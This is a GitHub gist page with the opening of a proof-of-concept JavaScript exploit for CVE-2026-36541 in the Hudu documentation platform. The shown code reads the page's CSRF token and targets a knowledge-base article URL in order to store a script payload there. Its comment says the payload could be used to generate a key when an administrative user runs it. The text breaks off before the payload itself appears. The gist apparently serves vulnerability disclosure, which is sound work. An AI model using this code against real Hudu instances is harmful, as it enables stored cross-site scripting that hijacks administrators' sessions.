Skip to content

Instantly share code, notes, and snippets.

View justinbrick's full-sized avatar

Justin justinbrick

View GitHub Profile
@justinbrick
justinbrick / CVE-2026-36541-POC.js
Created July 1, 2026 19:36
CVE-2026-36541 & CVE-2026-36542 Official Gist
/**
* Hudu CVE-2026-36541 PoC
* While any particular payload could have been used, this just demonstrates with a visual UI that could be used to generate a
* key if ran by an administrative user.
*/
(async function() {
const token = document.querySelector('meta[name="csrf-token"]')?.content;
const targetUrl = window.location.origin + '/kba/{kba_id}'; // Replace {kba_id} with the target article ID
// 1. The HTML and Script Payload to be stored in the KBA